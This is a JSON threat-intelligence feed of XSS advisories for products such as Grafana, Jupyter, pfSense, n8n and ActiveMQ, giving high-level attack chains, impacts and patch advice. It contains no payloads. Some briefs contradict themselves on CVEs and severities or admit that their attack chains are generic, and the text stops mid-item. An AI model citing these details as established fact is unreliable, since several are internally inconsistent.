{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/xss/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Grafana"],"_cs_severities":["medium"],"_cs_tags":["grafana","xss","information-disclosure","cloud"],"_cs_type":"advisory","_cs_vendors":["Grafana"],"content_html":"\u003cp\u003eGrafana is susceptible to multiple vulnerabilities that could allow unauthorized access and data compromise. A remote, anonymous attacker can exploit these weaknesses to perform Cross-Site Scripting (XSS) attacks or disclose sensitive information. This poses a risk to the confidentiality and integrity of Grafana instances and the data they manage. Defenders need to implement detection and mitigation measures to prevent potential exploitation. The specific Grafana versions affected are not specified in the advisory.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eSince the specific attack chain is not detailed in the source, a generic attack chain is provided based on common web application vulnerabilities:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Grafana instance accessible over the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting a vulnerable endpoint in Grafana.\u003c/li\u003e\n\u003cli\u003eThis request exploits a Cross-Site Scripting (XSS) vulnerability, injecting malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eAlternatively, the request exploits an information disclosure vulnerability to access sensitive data.\u003c/li\u003e\n\u003cli\u003eIf XSS is successful, a user interacting with Grafana executes the injected JavaScript.\u003c/li\u003e\n\u003cli\u003eThe malicious script can steal user credentials, session tokens, or other sensitive 
data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to Grafana.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive information or performs other malicious actions within the Grafana instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to the compromise of sensitive information, including user credentials, API keys, and internal system details. An attacker could leverage XSS to manipulate Grafana dashboards, inject malicious content, or redirect users to phishing sites. Information disclosure could expose sensitive configuration data or metrics, potentially leading to further attacks. The number of affected Grafana instances is currently unknown, but any publicly accessible instance is potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eGrafana Suspicious URI Activity\u003c/code\u003e to detect potential exploitation attempts targeting Grafana instances via unusual URL patterns (log source: webserver).\u003c/li\u003e\n\u003cli\u003eEnable and review webserver logs for Grafana instances to identify suspicious activity, specifically cs-uri-query and cs-uri-stem (log source: webserver).\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) to filter out malicious requests and protect against common web application attacks, including XSS (log source: firewall).\u003c/li\u003e\n\u003cli\u003eUpgrade Grafana to the latest version as soon as security patches are available to address the identified vulnerabilities (affected_products: Grafana).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T09:54:33Z","date_published":"2026-05-04T09:54:33Z","id":"/briefs/2026-05-grafana-vulns/","summary":"Multiple vulnerabilities in Grafana allow a remote, 
anonymous attacker to conduct a Cross-Site Scripting attack or disclose information.","title":"Grafana Multiple Vulnerabilities Leading to XSS and Information Disclosure","url":"https://feed.craftedsignal.io/briefs/2026-05-grafana-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2025-14320"}],"_cs_exploited":false,"_cs_products":["Online Support Application (V3 through 31122025)"],"_cs_severities":["medium"],"_cs_tags":["xss","reflected-xss","cve-2025-14320"],"_cs_type":"advisory","_cs_vendors":["Tegsoft"],"content_html":"\u003cp\u003eA reflected cross-site scripting (XSS) vulnerability, identified as CVE-2025-14320, exists within the Tegsoft Management and Information Services Trade Limited Company Online Support Application. This vulnerability affects versions V3 through 31122025. An attacker can exploit this vulnerability by injecting malicious scripts into a web page, which is then reflected back to the user, leading to potential data theft, session hijacking, or website defacement. This vulnerability was reported by the Computer Emergency Response Team of the Republic of Turkey. 
Successful exploitation requires tricking a user into clicking a specially crafted link.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a JavaScript payload.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL via email, social media, or other means.\u003c/li\u003e\n\u003cli\u003eUnsuspecting user clicks the malicious URL.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser sends a request to the vulnerable Tegsoft Online Support Application with the malicious script as a parameter.\u003c/li\u003e\n\u003cli\u003eThe Tegsoft application fails to properly sanitize the input.\u003c/li\u003e\n\u003cli\u003eThe application reflects the malicious script back to the user\u0026rsquo;s browser within the HTML response.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the malicious script.\u003c/li\u003e\n\u003cli\u003eThe script can then perform actions such as stealing cookies, redirecting the user to a phishing site, or defacing the web page.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this reflected XSS vulnerability can lead to the execution of arbitrary JavaScript code in the context of the victim\u0026rsquo;s browser. This can result in session hijacking, where an attacker gains unauthorized access to the user\u0026rsquo;s account. It can also lead to data theft, where sensitive information is stolen from the user\u0026rsquo;s browser. 
Furthermore, the attacker can redirect the user to a phishing website or deface the Online Support Application, potentially impacting multiple users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or updates from Tegsoft to address CVE-2025-14320 on the Online Support Application.\u003c/li\u003e\n\u003cli\u003eImplement proper input validation and output encoding to prevent XSS vulnerabilities in the application based on CWE-79.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect potential XSS attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of clicking on suspicious links to mitigate the initial access vector.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T09:15:59Z","date_published":"2026-05-04T09:15:59Z","id":"/briefs/2024-01-tegsoft-xss/","summary":"CVE-2025-14320 is a reflected cross-site scripting (XSS) vulnerability in Tegsoft Online Support Application versions V3 through 31122025, allowing attackers to inject arbitrary web scripts into user browsers.","title":"Tegsoft Online Support Application Reflected XSS Vulnerability (CVE-2025-14320)","url":"https://feed.craftedsignal.io/briefs/2024-01-tegsoft-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5063"}],"_cs_exploited":false,"_cs_products":["NEX-Forms – Ultimate Forms Plugin for WordPress plugin \u003c= 9.1.11"],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","stored-xss","cve-2026-5063"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe NEX-Forms – Ultimate Forms Plugin for WordPress, versions up to and including 9.1.11, is susceptible to a stored Cross-Site Scripting (XSS) vulnerability (CVE-2026-5063). This flaw stems from inadequate input sanitization and output escaping within the \u003ccode\u003esubmit_nex_form()\u003c/code\u003e function. 
Unauthenticated attackers can exploit this vulnerability by injecting malicious JavaScript code through POST parameter key names. Successful exploitation allows the attacker to execute arbitrary scripts in the context of a user\u0026rsquo;s browser when they access a page containing the injected script, potentially leading to session hijacking, defacement, or redirection to malicious sites. The vulnerability was reported to Wordfence and a patch has been released.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request to a WordPress page that utilizes the vulnerable NEX-Forms plugin.\u003c/li\u003e\n\u003cli\u003eThe POST request includes specially crafted parameter key names designed to inject JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esubmit_nex_form()\u003c/code\u003e function processes the POST request without properly sanitizing or escaping the malicious input.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code is stored in the WordPress database.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses a page where the form data, including the malicious script, is displayed.\u003c/li\u003e\n\u003cli\u003eThe stored JavaScript code executes within the user\u0026rsquo;s browser in the context of the WordPress page.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as stealing cookies, redirecting the user, or modifying the page content.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability allows an unauthenticated attacker to inject arbitrary JavaScript code into pages using the NEX-Forms plugin. This can lead to various malicious outcomes, including user session hijacking, website defacement, or redirection to phishing sites. 
As the vulnerability is stored, every user who visits a page containing the malicious script will be affected until the vulnerability is patched and the malicious input is removed. The severity is rated as HIGH with a CVSS base score of 7.2.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the NEX-Forms – Ultimate Forms Plugin for WordPress to a version beyond 9.1.11 to patch CVE-2026-5063.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious NEX-Forms POST Requests\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests containing potentially malicious JavaScript code in parameter names.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-03T06:15:57Z","date_published":"2026-05-03T06:15:57Z","id":"/briefs/2026-05-wordpress-nex-forms-xss/","summary":"The NEX-Forms WordPress plugin is vulnerable to stored XSS via POST parameter key names, allowing unauthenticated attackers to inject arbitrary web scripts.","title":"NEX-Forms WordPress Plugin Vulnerable to Stored Cross-Site Scripting (CVE-2026-5063)","url":"https://feed.craftedsignal.io/briefs/2026-05-wordpress-nex-forms-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5113"}],"_cs_exploited":false,"_cs_products":["Gravity Forms plugin \u003c= 2.10.0"],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","gravityforms","cve-2026-5113","stored-xss"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Gravity Forms plugin for WordPress, a popular form builder, contains a stored cross-site scripting (XSS) vulnerability identified as CVE-2026-5113. This flaw affects versions up to and including 2.10.0. The vulnerability stems from a flawed state validation mechanism combined with insufficient output escaping within the Consent field\u0026rsquo;s hidden inputs. 
An unauthenticated attacker can exploit this by injecting malicious JavaScript code into form entries. This malicious code is then executed when an authenticated administrator accesses the Entries List page within the WordPress administration panel, potentially leading to account compromise or other malicious actions performed within the administrator\u0026rsquo;s session. Successful exploitation allows attackers to execute arbitrary web scripts in the context of an administrator\u0026rsquo;s browser.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious payload containing XSS code within a Gravity Forms Consent field. The payload leverages HTML tags like \u003ccode\u003e\u0026lt;svg\u0026gt;\u003c/code\u003e that \u003ccode\u003ewp_kses()\u003c/code\u003e will strip.\u003c/li\u003e\n\u003cli\u003eThe attacker submits the crafted form entry to the WordPress site.\u003c/li\u003e\n\u003cli\u003eThe Gravity Forms plugin\u0026rsquo;s state validation mechanism calculates two hashes: one for the raw input and another after sanitization via \u003ccode\u003ewp_kses()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDue to the nature of the XSS payload, the \u003ccode\u003ewp_kses()\u003c/code\u003e function strips the \u003ccode\u003e\u0026lt;svg\u0026gt;\u003c/code\u003e tag, resulting in a matching hash for the sanitized input.\u003c/li\u003e\n\u003cli\u003eThe flawed validation logic fails to detect the malicious intent because at least one hash matches the original state, allowing the malicious raw value (containing the XSS payload) to be stored in the database.\u003c/li\u003e\n\u003cli\u003eAn authenticated administrator logs into the WordPress administration panel.\u003c/li\u003e\n\u003cli\u003eThe administrator navigates to the Entries List page for the affected Gravity Form.\u003c/li\u003e\n\u003cli\u003eThe stored malicious consent label is retrieved from the 
database and output without proper escaping, causing the XSS payload to execute within the administrator\u0026rsquo;s browser session.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5113 allows unauthenticated attackers to execute arbitrary web scripts within the context of an authenticated administrator\u0026rsquo;s browser session. This can lead to a variety of malicious outcomes, including account compromise, data theft, modification of website content, or further propagation of the attack to other administrative users. The severity of the impact depends on the privileges held by the compromised administrator account.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Gravity Forms plugin to the latest version, which includes a fix for CVE-2026-5113.\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) rule to filter out requests containing potentially malicious XSS payloads targeting the Gravity Forms Consent field.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to form submissions containing encoded or obfuscated JavaScript code. 
Analyze HTTP request parameters for unusual characters or patterns indicative of XSS attempts.\u003c/li\u003e\n\u003cli\u003eEnable output escaping on form entries to prevent stored XSS attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-02T06:16:04Z","date_published":"2026-05-02T06:16:04Z","id":"/briefs/2026-05-gravityforms-xss/","summary":"The Gravity Forms plugin for WordPress is vulnerable to stored cross-site scripting (XSS) via Consent field hidden inputs, allowing unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the entries list page.","title":"Gravity Forms Plugin Stored XSS Vulnerability (CVE-2026-5113)","url":"https://feed.craftedsignal.io/briefs/2026-05-gravityforms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["@jupyter-notebook/help-extension","notebook","jupyterlab","@jupyterlab/help-extension","Jupyter Notebook"],"_cs_severities":["high"],"_cs_tags":["xss","jupyter","authentication","account-takeover","vulnerability"],"_cs_type":"advisory","_cs_vendors":["Jupyter","NVIDIA"],"content_html":"\u003cp\u003eA stored Cross-Site Scripting (XSS) vulnerability has been identified in Jupyter Notebook and JupyterLab, impacting versions 7.0.0 through 7.5.5 of Jupyter Notebook and versions up to 4.5.6 of JupyterLab. Discovered by Daniel Teixeira of the NVIDIA AI Red Team, this flaw allows an attacker to craft malicious notebook files containing XSS payloads embedded within the command linker functionality. When a user opens and interacts with these files, the injected script executes, potentially stealing the user\u0026rsquo;s authentication token. Successful exploitation grants the attacker full control over the user\u0026rsquo;s Jupyter account, enabling them to read, modify, and create files, execute arbitrary code via running kernels, and establish shell access through created terminals. 
This vulnerability poses a significant risk to data confidentiality, integrity, and system availability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious Jupyter Notebook file containing a stored XSS payload within the command linker functionality.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious notebook file to a target user (e.g., via email, shared repository, or compromised website).\u003c/li\u003e\n\u003cli\u003eThe victim opens the malicious notebook file in a vulnerable version of Jupyter Notebook or JupyterLab.\u003c/li\u003e\n\u003cli\u003eThe victim interacts with a seemingly legitimate control element within the notebook that is, in fact, part of the XSS payload.\u003c/li\u003e\n\u003cli\u003eThe injected XSS code executes in the victim\u0026rsquo;s browser, stealing their authentication token.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen authentication token to authenticate to the Jupyter REST API.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control over the victim\u0026rsquo;s Jupyter account.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious actions, such as reading files, modifying files, executing arbitrary code, or creating terminals for shell access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability enables complete account takeover, allowing attackers to read, modify, and create files, access running kernels and execute arbitrary code, and create terminals for shell access within the victim\u0026rsquo;s Jupyter environment. This can lead to data exfiltration, code injection, and potential compromise of sensitive information stored within the Jupyter Notebook environment. 
Given the widespread use of Jupyter Notebook in data science, machine learning, and research environments, this vulnerability can have far-reaching consequences for individuals and organizations relying on these tools.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade Jupyter Notebook to version 7.5.6 or later, and JupyterLab to version 4.5.7 or later to patch CVE-2026-40171.\u003c/li\u003e\n\u003cli\u003eApply the workaround to disable the help extension via CLI as specified in the advisory to mitigate the vulnerability until patching is possible.\u003c/li\u003e\n\u003cli\u003eImplement the hardening measure by disabling the command linker functionality via \u003ccode\u003eoverrides.json\u003c/code\u003e to prevent XSS attacks, referencing the configuration details in the advisory.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Jupyter Notebook CommandLinker XSS Attempt\u0026rdquo; to detect potential exploitation attempts based on specific HTTP request characteristics.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of opening untrusted Jupyter Notebook files and interacting with potentially malicious content.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T17:25:47Z","date_published":"2026-04-30T17:25:47Z","id":"/briefs/2024-01-30-jupyter-xss/","summary":"A stored Cross-Site Scripting (XSS) vulnerability in Jupyter Notebook versions 7.0.0 through 7.5.5 and JupyterLab versions up to 4.5.6 allows attackers to steal authentication tokens by tricking users into interacting with malicious notebook files, leading to complete account takeover via the Jupyter REST API.","title":"Jupyter Notebook Authentication Token Theft via CommandLinker XSS","url":"https://feed.craftedsignal.io/briefs/2024-01-30-jupyter-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["pfSense CE (\u003c= 2.8.1)","pfSense Plus (\u003c= 
26.03)"],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","pfSense"],"_cs_type":"advisory","_cs_vendors":["Netgate"],"content_html":"\u003cp\u003eA vulnerability has been discovered in Netgate\u0026rsquo;s pfSense products. This vulnerability, a cross-site scripting (XSS) flaw, can be exploited by an attacker to inject arbitrary web scripts into a trusted website. The vulnerability affects pfSense CE versions 2.8.1 and earlier, as well as pfSense Plus versions 26.03 and earlier. The CERT-FR advisory was published on April 30, 2026, referencing Netgate security bulletin pfSense-SA-26_05, dated April 29, 2026. Successful exploitation of this vulnerability could allow an attacker to execute malicious code in the context of a user\u0026rsquo;s browser, potentially leading to session hijacking, defacement, or redirection to malicious sites.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable pfSense CE or Plus instance (\u0026lt;=2.8.1 or \u0026lt;=26.03 respectively).\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a cross-site scripting payload.\u003c/li\u003e\n\u003cli\u003eThe URL is delivered to a targeted pfSense user, typically via phishing or social engineering.\u003c/li\u003e\n\u003cli\u003eThe user clicks the malicious link while authenticated to the pfSense web GUI.\u003c/li\u003e\n\u003cli\u003eThe pfSense web application fails to properly sanitize the attacker\u0026rsquo;s input.\u003c/li\u003e\n\u003cli\u003eThe malicious XSS payload is reflected back to the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the attacker-supplied JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the user\u0026rsquo;s session or redirects the user to a malicious site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful 
exploitation of the XSS vulnerability in Netgate pfSense could allow an attacker to execute arbitrary code in a user\u0026rsquo;s browser, potentially leading to session hijacking and unauthorized access to the pfSense system. While the number of affected installations is not specified, pfSense is widely used in small to medium-sized businesses as a firewall and routing solution. A successful attack could compromise network security, leading to data breaches, service disruption, or further lateral movement within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the security patches outlined in Netgate\u0026rsquo;s security bulletin pfSense-SA-26_05 to remediate the XSS vulnerability on all affected pfSense CE (\u0026lt;= 2.8.1) and pfSense Plus (\u0026lt;= 26.03) instances.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious URI Access to pfSense Web GUI\u0026rdquo; to identify potential XSS exploitation attempts targeting the pfSense web interface.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of clicking suspicious links, especially those received via email or other untrusted sources, to mitigate phishing attacks that could lead to XSS exploitation (Attack Chain step 3).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T00:00:00Z","date_published":"2026-04-30T00:00:00Z","id":"/briefs/2026-05-netgate-xss/","summary":"A cross-site scripting (XSS) vulnerability affects Netgate pfSense CE (\u003c= 2.8.1) and pfSense Plus (\u003c= 26.03), potentially allowing attackers to inject malicious code.","title":"Netgate pfSense XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-netgate-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["n8n"],"_cs_severities":["high"],"_cs_tags":["xss","oauth","n8n","CVE-2026-42235"],"_cs_type":"advisory","_cs_vendors":["npm"],"content_html":"\u003cp\u003en8n, 
a workflow automation platform, is susceptible to a cross-site scripting (XSS) vulnerability (CVE-2026-42235) related to the registration of malicious MCP OAuth clients. An unauthenticated attacker can register an OAuth client with a crafted \u003ccode\u003eclient_name\u003c/code\u003e containing malicious JavaScript. This vulnerability exists in versions prior to 2.14.2 and also affects versions 2.17.0 to 2.17.3 and 2.18.0. A successful exploit allows the attacker to execute arbitrary JavaScript within a victim\u0026rsquo;s authenticated n8n session, potentially leading to credential theft, session token theft, workflow manipulation, or privilege escalation. Defenders should prioritize patching to version 2.14.2 or later to mitigate the risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker registers a malicious MCP OAuth client with a crafted \u003ccode\u003eclient_name\u003c/code\u003e containing an XSS payload.\u003c/li\u003e\n\u003cli\u003eA victim user navigates to the n8n instance and is presented with the malicious OAuth consent dialog.\u003c/li\u003e\n\u003cli\u003eThe victim user authorizes the malicious OAuth client, unknowingly injecting the attacker\u0026rsquo;s script into their session.\u003c/li\u003e\n\u003cli\u003eA second user, possibly an administrator, revokes the OAuth access granted to the malicious client.\u003c/li\u003e\n\u003cli\u003eThis revocation triggers a toast notification to the original victim user.\u003c/li\u003e\n\u003cli\u003eThe toast notification renders the attacker\u0026rsquo;s injected script from the crafted \u003ccode\u003eclient_name\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe victim user clicks on the link within the toast notification.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes within the victim\u0026rsquo;s authenticated n8n browser session, enabling the attacker to perform malicious actions such as stealing 
credentials, manipulating workflows, or escalating privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to significant compromise of an n8n instance. Attackers can steal user credentials and session tokens, allowing them to impersonate legitimate users. Malicious actors could also modify or create workflows, leading to data breaches, system disruption, or unauthorized access. Privilege escalation is also possible, potentially granting attackers administrative control over the n8n platform. The number of potential victims depends on the exposure and user base of the vulnerable n8n instances.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade n8n to version 2.14.2 or later to patch CVE-2026-42235, as recommended in the advisory.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious n8n MCP OAuth Client Registration\u003c/code\u003e to identify attempts to register OAuth clients with suspicious names.\u003c/li\u003e\n\u003cli\u003eIf immediate patching is not feasible, restrict access to the n8n instance and the MCP OAuth registration endpoint to trusted users only, as suggested in the advisory\u0026rsquo;s workaround.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T21:25:44Z","date_published":"2026-04-29T21:25:44Z","id":"/briefs/2026-05-n8n-xss-oauth/","summary":"n8n is vulnerable to cross-site scripting (XSS) via a malicious MCP OAuth client, allowing an unauthenticated attacker to inject arbitrary JavaScript into an authenticated user's session.","title":"n8n MCP OAuth Client XSS 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-n8n-xss-oauth/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-21571"}],"_cs_exploited":false,"_cs_products":["Bamboo","Bitbucket","Confluence","Jira"],"_cs_severities":["critical"],"_cs_tags":["atlassian","vulnerability","code-execution","xss"],"_cs_type":"advisory","_cs_vendors":["Atlassian"],"content_html":"\u003cp\u003eMultiple vulnerabilities exist in Atlassian\u0026rsquo;s Bamboo, Bitbucket, Confluence, and Jira products. While specific CVEs are not detailed in this advisory, the potential impact is significant. An attacker exploiting these vulnerabilities could achieve arbitrary code execution, allowing for complete system compromise. They could also bypass security measures, potentially disabling logging or other security controls. Data manipulation and disclosure could lead to sensitive information compromise and unauthorized modifications. Cross-site scripting (XSS) attacks could be leveraged to steal user credentials or perform actions on behalf of unsuspecting users. 
Defenders need to ensure the Atlassian suite is fully patched and monitored.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker identifies a vulnerable Atlassian product instance (Bamboo, Bitbucket, Confluence, or Jira) accessible over the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerability Exploitation:\u003c/strong\u003e The attacker leverages an unknown vulnerability to inject malicious code into the application, possibly through a crafted HTTP request.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Execution:\u003c/strong\u003e The injected code executes within the context of the Atlassian application, allowing the attacker to run arbitrary commands on the server.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attacker leverages the initial code execution to escalate privileges, potentially gaining root or administrator access.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDefense Evasion:\u003c/strong\u003e The attacker attempts to disable security logging or other monitoring mechanisms to avoid detection.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Manipulation/Exfiltration:\u003c/strong\u003e The attacker accesses sensitive data stored within the Atlassian application or connected databases, manipulating or exfiltrating it for malicious purposes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e Using compromised credentials or established footholds, the attacker moves laterally to other systems within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker achieves their final objective, such as deploying ransomware, stealing intellectual property, or disrupting business operations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could result in significant damage, including complete compromise of Atlassian servers, data breaches, and disruption of critical business processes. The number of potential victims is substantial, as these Atlassian products are widely used across various industries. The impact ranges from data loss and financial damage to reputational harm and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to detect potential exploitation attempts targeting Atlassian products.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity, especially HTTP requests targeting Atlassian applications, to detect potential vulnerability exploitation.\u003c/li\u003e\n\u003cli\u003eEnable and review audit logs within Atlassian products (Bamboo, Bitbucket, Confluence, Jira) for suspicious activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a successful breach originating from a compromised Atlassian server.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T08:31:27Z","date_published":"2026-04-28T08:31:27Z","id":"/briefs/2026-04-atlassian-vulns/","summary":"Multiple vulnerabilities in Atlassian Bamboo, Bitbucket, Confluence, and Jira allow attackers to execute arbitrary code, bypass security measures, manipulate data, disclose information, or perform cross-site scripting attacks.","title":"Multiple Vulnerabilities in Atlassian 
Products","url":"https://feed.craftedsignal.io/briefs/2026-04-atlassian-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":4.3,"id":"CVE-2026-33227"},{"cvss":8.8,"id":"CVE-2026-34197"},{"cvss":7.5,"id":"CVE-2026-40046"},{"cvss":7.5,"id":"CVE-2026-39304"},{"cvss":8.8,"id":"CVE-2026-40466"}],"_cs_exploited":false,"_cs_products":["ActiveMQ"],"_cs_severities":["critical"],"_cs_tags":["activemq","rce","xss","apache"],"_cs_type":"advisory","_cs_vendors":["Apache"],"content_html":"\u003cp\u003eMultiple vulnerabilities in Apache ActiveMQ allow a remote, authenticated attacker to execute arbitrary code or perform cross-site scripting (XSS) attacks. While specific CVEs and attack vectors are not detailed in this advisory, the presence of both RCE and XSS vulnerabilities suggests a high risk to organizations using affected versions of ActiveMQ. Exploitation requires authentication, implying that attackers may need to compromise credentials or exploit other vulnerabilities to gain initial access. This combination of vulnerabilities could lead to complete system compromise, data theft, or service disruption. The lack of specific version information makes it crucial for organizations to identify and patch all potentially vulnerable ActiveMQ instances.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack 